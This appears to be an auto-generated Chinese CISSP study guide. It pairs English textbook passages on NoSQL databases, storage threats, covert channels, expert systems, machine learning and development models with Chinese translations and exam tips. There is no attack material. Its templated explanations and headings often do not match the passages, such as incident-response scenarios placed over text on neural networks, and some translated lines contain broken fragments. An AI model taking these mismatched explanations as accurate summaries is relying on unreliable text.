考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 59 / PDF P1382

第 1382 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 20.11 ODBC as the interface between applications and a backend database system NoSQL As database technology evolves, many organizations are turning away from the relational model for cases where they require increased speed or their data does not neatly fit into tabular form. NoSQL databases are a class of databases that use models other than the relational model to store data. There are many different types of NoSQL database. As you prepare for the CISSP exam, you should be familiar with these common types: Key-value stores are perhaps the simplest possible form of database.

They store information in key-value pairs, where the key is essentially an index used to uniquely identify a record, which consists of a data value. Key-value stores are useful for high-speed applications and very large datasets where the rigid structure of a relational model would require significant, and perhaps unnecessary, overhead. Graph databases store data in graph format, using nodes to represent objects and edges to represent relationships. They are useful for representing any type of network, such as social networks, geographic locations, and other datasets that lend themselves to graph representations.

中文直译 / 整理

图 20.11 ODBC 作为应用程序与后端数据库系统之间的接口 NoSQL 随着数据库技术的发展,许多组织在需要更高速度或数据无法整齐地适应表 格形式时,正在放弃关系模型。 NoSQL 数据库是一类使用非关系模型存储 数据的数据库。 NoSQL 数据库有多种不同类型。 在准备 CISSP 考试时,您应熟悉以下常见类 型: 键值存储 可能是最简单的数据库形式。 它们以键值对的形式存储信息,其 中键本质上是一个用于唯一标识记录的索引,该记录由数据值组成。 键值 存储适用于高速应用和超大数据集,在这些场景中,关系模型的严格结构 会带来显著且可能不必要的开销。 图数据库 以图格式存储数据,使用节点表示对象,使用边表示关系。 它们适用于表示任何类型的网络,例如社交网络、地理位置以及其他适 合图表示的数据集。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1382 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 60 / PDF P1383

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Document stores are similar to key-value stores in that they store information using keys, but the type of information they store is typically more complex than that in a key-value store and is in the form of a document. Common document types used in document stores include XML and JSON. The security models used by NoSQL databases may differ significantly from relational databases. Security professionals in organizations that use this technology should familiarize themselves with the security features of the solutions they use and consult with database teams in the design of appropriate security controls.

Storage Threats Database management systems have helped harness the power of data and grant some control over who can access it and the actions they can perform on it. However, security professionals must keep in mind that DBMS security covers access to information through only the traditional “front-door” channels. Data is also processed through a computer's storage resources— both memory and physical media. Precautions must be in place to ensure that these basic resources are protected against security vulnerabilities as well. After all, you would never incur a lot of time and expense to secure the front door of your home and then leave the backdoor wide open, would you?

Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures,” included a comprehensive look at different types of storage. Let's take a look at two main threats posed against data storage systems. First, the threat of illegitimate access to storage resources exists no matter what type of storage is in use. If administrators do not implement adequate file system access controls, an intruder might stumble across sensitive data simply by browsing the file system. In more sensitive environments, administrators should also protect against attacks that involve bypassing operating system controls and directly accessing the physical storage media to retrieve data.

This is best accomplished through the use of an encrypted file system, which is accessible only through the primary operating system. Furthermore, systems that operate in a multilevel security environment should provide adequate controls to ensure that shared memory and storage resources are set up with appropriate controls so that data from one classification level is not readable at a lower classification level.

中文直译 / 整理

文档存储 与键值存储类似,都使用键来存储信息,但它们存储的信息类型 通常比键值存储更复杂,且以文档形式呈现。 文档存储中常用的文档类型 包括 XML 和 JSON。 NoSQL数据库所使用的安全模型可能与关系型数据库有显著差异。 使用此技 术的组织中的安全专业人员应熟悉其所用解决方案的安全功能,并在设计适 当的安全控制措施时与数据库团队进行咨询。 存储威胁 数据库管理系统有助于发挥数据的威力,并对谁可以访问数据以及他们可以执 行的操作进行一定程度的控制。 然而,安全专业人员必须牢记,DBMS安全仅 涵盖通过传统“前门”通道访问信息的情况。 数据还会通过计算机的存储资源—— 包括内存和物理介质——进行处理。 必须采取预防措施,确保这些基本资源也免 受安全漏洞的威胁。 毕竟,你不会花费大量时间和费用来保护家中的前门,却 任由后门大开,对吧? 第9章,“安全漏洞、威胁与对策”全面探讨了不同类型的存储。 让我们来看看 数据存储系统面临的两种主要威胁。 首先,无论使用何种类型的存储,非法访 问存储资源的威胁都始终存在。 如果管理员未实施足够的文件系统访问控制, 入侵者可能仅通过浏览文件系统就能偶然发现敏感数据。

在更敏感的环境中, 管理员还应防范绕过操作系统控制并直接访问物理存储介质以获取数据的攻击。 这最好通过使用加密文件系统来实现,该系统仅能通过主操作系统访问。 此外, 在多级安全环境中运行的系统应提供足够的控制措施,确保共享内存和存储资 源设置适当的权限,使来自一个分类级别的数据无法在较低分类级别被读取。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 61 / PDF P1384

威胁建模方法:PASTA、STRIDE、DREAD

分类、建模、评分、优先级是不同层次。

教材原文段落

Errors in storage access controls become particularly dangerous in cloud computing environments, where a single misconfiguration can publicly expose sensitive information on the web. Organizations leveraging cloud storage systems, such as Amazon's Simple Storage Service (S3), should take particular care to set strong default security settings that restrict public access and then carefully monitor any changes to that policy that allow public access. Covert channel attacks pose the second primary threat against data storage resources.

Covert storage channels allow the transmission of sensitive data between classification levels through the direct or indirect manipulation of shared storage media. This may be as simple as writing sensitive data to an inadvertently shared portion of memory or physical storage. More complex covert storage channels might be used to manipulate the amount of free space available on a disk or the size of a file to covertly convey information between security levels. For more information on covert channel analysis, see Chapter 8.

Understanding Knowledge-Based Systems Since the advent of computing, engineers and scientists have worked toward developing systems capable of performing routine actions that would bore a human and consume a significant amount of time. The majority of the achievements in this area have focused on relieving the burden of computationally intensive tasks. However, researchers have also made giant strides toward developing systems that have an “artificial intelligence” that can simulate (to some extent) the purely human power of reasoning. The following sections examine three types of knowledge-based artificial intelligence (AI) systems: expert systems, machine learning, and neural networks.

We'll also take a look at their potential applications to computer security problems. Expert Systems Expert systems seek to embody the accumulated knowledge of experts on a particular subject and apply it in a consistent fashion to future decisions.

中文直译 / 整理

存储访问控制中的错误在云计算环境中尤其危险,因为单个配置错误就 可能使敏感信息在互联网上公开暴露。 使用云存储系统(如亚马逊的简单存 储服务S3)的组织应特别注意设置强大的默认安全设置,以限制公共访问, 并仔细监控任何允许公共访问的策略变更。 隐蔽信道攻击是对数据存储资源的第二大主要威胁。 隐蔽存储信道通过直接或 间接操纵共享存储介质,允许在不同安全级别之间传输敏感数据。 这可能仅仅 是将敏感数据写入意外共享的内存或物理存储区域。 更复杂的隐蔽存储信道可 能用于操纵磁盘上可用的空闲空间量或文件大小,以在不同安全级别之间秘密 传递信息。 有关隐蔽信道分析的更多信息,请参阅第8章。 理解基于知识的系统 自计算机出现以来,工程师和科学家一直致力于开发能够执行会令人类感到枯 燥且耗费大量时间的常规任务的系统。 这一领域的大部分成就集中在减轻计算 密集型任务的负担上。 然而,研究人员也在开发具有“人工智能”的系统方面 取得了巨大进展,这些系统能够在一定程度上模拟人类独有的推理能力。 以下章节将探讨三种基于知识的人工智能(AI)系统:专家系统、机器学习 和神经网络。 我们还将考察它们在计算机安全问题中的潜在应用。

专家系统 专家系统旨在体现特定主题上专家的累积知识,并以一致的方式应用于未来的决 策。

小白解释

场景先行:你是公司的安全负责人,正在读第 1384 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:分类、建模、评分、优先级是不同层次。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

STRIDE:STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模方法:PASTA、STRIDE、DREAD”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

STRIDE 是威胁分类模型。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
STRIDE STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 62 / PDF P1385

第 1385 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Several studies have shown that expert systems, when properly developed and implemented, often make better decisions than some of their human counterparts when faced with routine decisions. Every expert system has two core components: the knowledge base and the inference engine. The knowledge base contains the rules known by an expert system. The knowledge base seeks to codify the knowledge of human experts in a series of “if/then” statements. Let's consider a simple expert system designed to help homeowners decide whether they should evacuate an area when a hurricane threatens.

The knowledge base might contain the following statements (these statements are for example purposes only): If the hurricane is a Category 4 storm or higher, then flood waters normally reach a height of 20 feet above sea level. If the hurricane has winds in excess of 120 miles per hour (mph), then wood-frame structures will be destroyed. If it is late in the hurricane season, then hurricanes tend to get stronger as they approach the coast. In an actual expert system, the knowledge base would contain hundreds or thousands of assertions such as those just listed.

The second major component of an expert system—the inference engine— analyzes information in the knowledge base to arrive at the appropriate decision. The expert system user employs some sort of user interface to provide the inference engine with details about the current situation, and the inference engine uses a combination of logical reasoning and fuzzy logic techniques to draw a conclusion based on past experience. Continuing with the hurricane example, a user might inform the expert system that a Category 4 hurricane is approaching the coast with wind speeds averaging 140 mph.

The inference engine would then analyze information in the knowledge base and make an evacuation recommendation based on that past knowledge. Expert systems are not infallible—they're only as good as the data in the knowledge base and the decision-making algorithms implemented in the inference engine. However, they have one major advantage in stressful situations—their decisions do not involve judgment clouded by emotion. Expert systems can play an important role in analyzing emergency events, stock trading, and other scenarios in which emotional investment sometimes

中文直译 / 整理

多项研究表明,当专家系统得到适当开发和实施时,在面对常规决策时, 其决策质量往往优于某些人类同行。 每个专家系统都有两个核心组件:知识库和推理引擎。 知识库包含专家系统所知晓的规则。 知识库旨在将人类专家的知识编码为一系 列“如果/那么”语句。 让我们考虑一个简单的专家系统,它帮助房主在飓风威 胁时决定是否应撤离该区域。 知识库可能包含以下语句(这些语句仅用于示例): 如果飓风是Cate gory 4 storm或hi gher,则洪水 通常会达到海平面以上20英尺的高度。 如果飓风的风速超过每小时120英里(mph),则木结构建筑将被摧毁。 如果处于飓风季节的后期,则飓风在接近海岸时往往会增强。 在实际的专家系统中,知识库将包含数百甚至数千条如上所列的断言。 专家系统的第二个主要组成部分——推理引擎——分析知识库中的信息以得出适 当的决策。 专家系统的用户通过某种用户界面向推理引擎提供有关当前情况的 详细信息,推理引擎则结合逻辑推理和模糊逻辑技术,根据以往经验得出结论。 继续以飓风为例,用户可能告知专家系统,一个四级飓风正以平均风速140英里/ 小时的速度接近海岸。

推理引擎随后将分析知识库中的信息,并根据以往知识 做出疏散建议。 专家系统并非完美无缺——它们的好坏取决于知识库中的数据和推理引擎中实 现的决策算法。 然而,它们在压力情境下具有一大优势:其决策不受情绪干扰。 专家系统在分析紧急事件、股票交易以及其他有时情感投入会影响判断的场景 中,可以发挥重要作用。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1385 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 63 / PDF P1386

第 1386 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

gets in the way of a logical decision. For this reason, many lending institutions now use expert systems to make credit decisions instead of relying on loan officers who might say to themselves, “Well, Jim hasn't paid his bills on time, but he seems like a perfectly nice guy.” Machine Learning Machine learning techniques use analytic capabilities to develop knowledge from datasets without the direct application of human insight. The core approach of machine learning is to allow the computer to analyze and learn directly from data, developing and updating models of activity.

Machine learning techniques fall into two major categories: Supervised learning techniques use labeled data for training. The analyst creating a machine learning model provides a dataset along with the correct answers and allows the algorithm to develop a model that may then be applied to future cases. For example, if an analyst would like to develop a model of malicious system logins, the analyst would provide a dataset containing information about logins to the system over a period of time and indicate which were malicious. The algorithm would use this information to develop a model of malicious logins. Unsupervised learning techniques use unlabeled data for training.

The dataset provided to the algorithm does not contain the “correct” answers; instead, the algorithm is asked to develop a model independently. In the case of logins, the algorithm might be asked to identify groups of similar logins. An analyst could then look at the groups developed by the algorithm and attempt to identify groups that may be malicious. Neural Networks In neural networks, chains of computational units are used in an attempt to imitate the biological reasoning process of the human mind.

In an expert system, a series of rules is stored in a knowledge base, whereas in a neural network, a long chain of computational decisions that feed into each other and eventually sum to produce the desired output is set up. Neural networks are a subset of machine learning techniques and are also commonly referred to as deep learning. Keep in mind that no neural network designed to date comes close to having the reasoning power of the human mind. Nevertheless, neural networks show

中文直译 / 整理

干扰逻辑决策。 因此,许多贷款机构现在使用专家系统来做信贷决策,而不 是依赖可能对自己说“嗯,吉姆没有按时还账,但他看起来是个很友善的人” 的贷款专员。 机器学习 机器学习技术利用分析能力从数据集中开发知识,而无需直接应用人类的洞 察力。 机器学习的核心方法是让计算机直接从数据中分析和学习,从而开发 和更新活动模型。 机器学习技术分为两大类: 监督学习技术使用带标签的数据进行训练。 创建机器学习模型的分析师会 提供一个数据集以及正确的答案,让算法开发出一个可用于未来案例的模 型。 例如,如果分析师希望开发一个恶意系统登录的模型,他们会提供一 个包含一段时间内系统登录信息的数据集,并指出哪些是恶意的。 算法将 利用这些信息开发出恶意登录的模型。 无监督学习技术使用未标记的数据进行训练。 提供给算法的数据集不 包含“正确”答案; 相反,算法被要求独立开发模型。 在登录的情况下, 算法可能被要求识别相似登录的群组。 分析师随后可以查看算法生成的群 组,并尝试识别可能为恶意的群组。 神经网络 在神经网络中,使用计算单元的链路来模拟人脑的生物推理过程。

在专家系统 中,一系列规则被存储在知识库中,而在神经网络中,则建立了一条长链的计 算决策,这些决策相互传递并最终求和以产生期望的输出。 神经网络是机器学 习技术的一个子集,也通常被称为深度学习。 请记住,迄今为止设计的任何神经网络都远未达到人类思维的推理能力。 然而,神 经网络展现出

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1386 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 64 / PDF P1387

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

great potential to advance the AI field beyond its current state. Benefits of neural networks include linearity, input-output mapping, and adaptivity. These benefits are evident in the implementations of neural networks for voice recognition, face recognition, weather prediction, and the exploration of models of thinking and consciousness. Typical neural networks involve many layers of summation, each of which requires weighting information to reflect the relative importance of the calculation in the overall decision-making process. The weights must be custom-tailored for each type of decision the neural network is expected to make.

This is accomplished through the use of a training period during which the network is provided with inputs for which the proper decision is known. The algorithm then works backward from these decisions to determine the proper weights for each node in the computational chain. This activity is performed using what is known as the Delta rule. Through the use of the Delta rule, neural networks are able to learn from experience. Knowledge-based analytic techniques have great applications in the field of computer security. One of the major advantages offered by these systems is their capability to rapidly make consistent decisions.

One of the major problems in computer security is the inability of system administrators to consistently and thoroughly analyze massive amounts of log and audit trail data to look for anomalies. It seems like a match made in heaven. Summary Data is the most valuable resource many organizations possess. Therefore, it's critical that information security practitioners understand the necessity of safeguarding the data itself and the systems and applications that assist in the processing of that data. Protections against malicious code, database vulnerabilities, and system/application development flaws must be implemented in every technology-aware organization.

By this point, you no doubt recognize the importance of placing adequate access controls and audit trails on these valuable information resources. Database security is a rapidly growing field; if databases play a major role in your security duties, take the time to sit down with database administrators, courses, and textbooks and learn the underlying theory. It's a valuable investment.

中文直译 / 整理

推动人工智能领域超越当前状态的巨大潜力。 神经网络的优势包括线性性、输 入‑输出映射和适应性。 这些优势在神经网络用于语音识别、人脸识别、天气预 测以及思维和意识模型探索的实现中得到了体现。 典型的神经网络包含多层求和,每一层都需要加权信息,以反映计算在整体决 策过程中的相对重要性。 这些权重必须根据神经网络预期做出的每种决策进行 定制。 这通过一个训练期来实现,在此期间,网络会接收已知正确决策的输入。 然后,算法从这些决策反向推导,以确定计算链中每个节点的适当权重。 这一 过程使用的是所谓的 Delta规则。 通过使用 Delta 规则,神经网络能够从经验 中学习。 基于知识的分析技术在计算机安全领域具有广泛的应用。 这些系统提供的主 要优势之一是能够快速做出一致的决策。 计算机安全中的一个主要问题是系 统管理员无法一致且彻底地分析海量的日志和审计跟踪数据以寻找异常。 这 似乎像是天作之合。 摘要 数据是许多组织拥有的最有价值的资源。 因此,信息安全从业者必须理解保护 数据本身以及协助处理该数据的系统和应用程序的必要性。 每个具备技术意识 的组织都必须实施针对恶意代码、数据库漏洞以及系统/应用程序开发缺陷的防 护措施。

到目前为止,您无疑已经认识到对这些宝贵的信息资源实施充分的访问控制和 审计跟踪的重要性。 数据库安全是一个迅速发展的领域; 如果数据库在您的安 全职责中扮演重要角色,请花时间与数据库管理员、课程和教材一起学习其基 本理论。 这是一项很有价值的投资。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 65 / PDF P1388

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Finally, various controls can be put into place during the system and application development process to ensure that the end product of these processes is compatible with operation in a secure environment. Such controls include process isolation, hardware segmentation, abstraction, and contractual arrangements such as service-level agreements (SLAs). Security should always be introduced in the early planning phases of any development project and continually monitored throughout the design, development, deployment, and maintenance phases of production. Study Essentials Explain the basic architecture of a relational database management system (RDBMS).

Know the structure of relational databases. Be able to explain the function of tables (relations), rows (records/tuples), and columns (fields/attributes). Know how relationships are defined between tables and the roles of various types of keys. Describe the database security threats posed by aggregation and inference. Explain how expert systems, machine learning, and neural networks function. Expert systems consist of two core components: a knowledge base that contains a series of “if/then” rules and an inference engine that uses that information to draw conclusions about other data. Machine learning techniques attempt to algorithmically discover knowledge from datasets.

Neural networks simulate the functioning of the human mind to a limited extent by arranging a series of layered calculations to solve problems. Neural networks require extensive training on a particular problem before they are able to offer solutions. Understand the models of systems development. Know that the waterfall model describes a sequential development process that results in the development of a finished product. Developers may step back only one phase in the process if errors are discovered. The spiral model uses several iterations of the waterfall model to produce a number of fully specified and tested prototypes.

Agile development models place an emphasis on the needs of the customer and quickly developing new functionality that meets those needs in an iterative fashion. Explain the Scrum approach to Agile software development. Scrum is an organized approach to implementing the Agile philosophy. It relies on daily scrum meetings to organize and review work. Development focuses on short sprints of activity that deliver finished products. Integrated product

中文直译 / 整理

最后,在系统和应用程序开发过程中可以实施各种控制措施,以确保这些过程 的最终产品能够兼容于安全的运行环境。 此类控制措施包括进程隔离、硬件分 段、抽象以及合同安排,例如服务水平协议(SLA)。 安全应始终在任何开发 项目的早期规划阶段引入,并在整个设计、开发、部署和维护阶段持续监控。 学习必备 解释关系型数据库管理系统(RDBMS)的基本架构。 了解关系型数据库的结构。 能够解释表(关系)、行(记录/元组)和列(字段/属性)的功能。 了解表之间 关系的定义方式以及各种类型键的作用。 描述聚合和推断带来的数据库安全威胁。 Explain how ex pert s ystems , machine learnin g, 和神经 网络的功能。 专家系统由两个核心组件组成:一个包含一系列“如果/那么”规则 的知识库,以及一个利用这些信息对其他数据进行推断的推理引擎。 机器学习技 术试图通过算法从数据集中发现知识。 神经网络通过安排一系列分层计算来解决 问题,从而在一定程度上模拟人脑的功能。 神经网络需要在特定问题上进行大量 训练,才能提供解决方案。 理解系统开发的模型。

了解瀑布模型描述了一个顺序开发过程,最终产生一个完 整的成品。 如果发现错误,开发人员只能回退一个阶段。 螺旋模型通过多次迭代 瀑布模型,生成多个完全指定且经过测试的原型。 敏捷开发模型强调客户的需求, 并以迭代方式快速开发满足这些需求的新功能。 解释Scrum在敏捷软件开发中的方法。 Scrum是一种组织化的方法,用于实施 敏捷理念。 它依赖于每日Scrum会议来组织和审查工作。 开发侧重于短周期的冲 刺活动,以交付已完成的产品。 集成产品

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

分层:分层把控制按层排列,让攻击者必须连续突破。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

对象、角色、组、接口都可能体现 abstraction。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
分层 分层把控制按层排列,让攻击者必须连续突破。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 66 / PDF P1389

第 1389 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

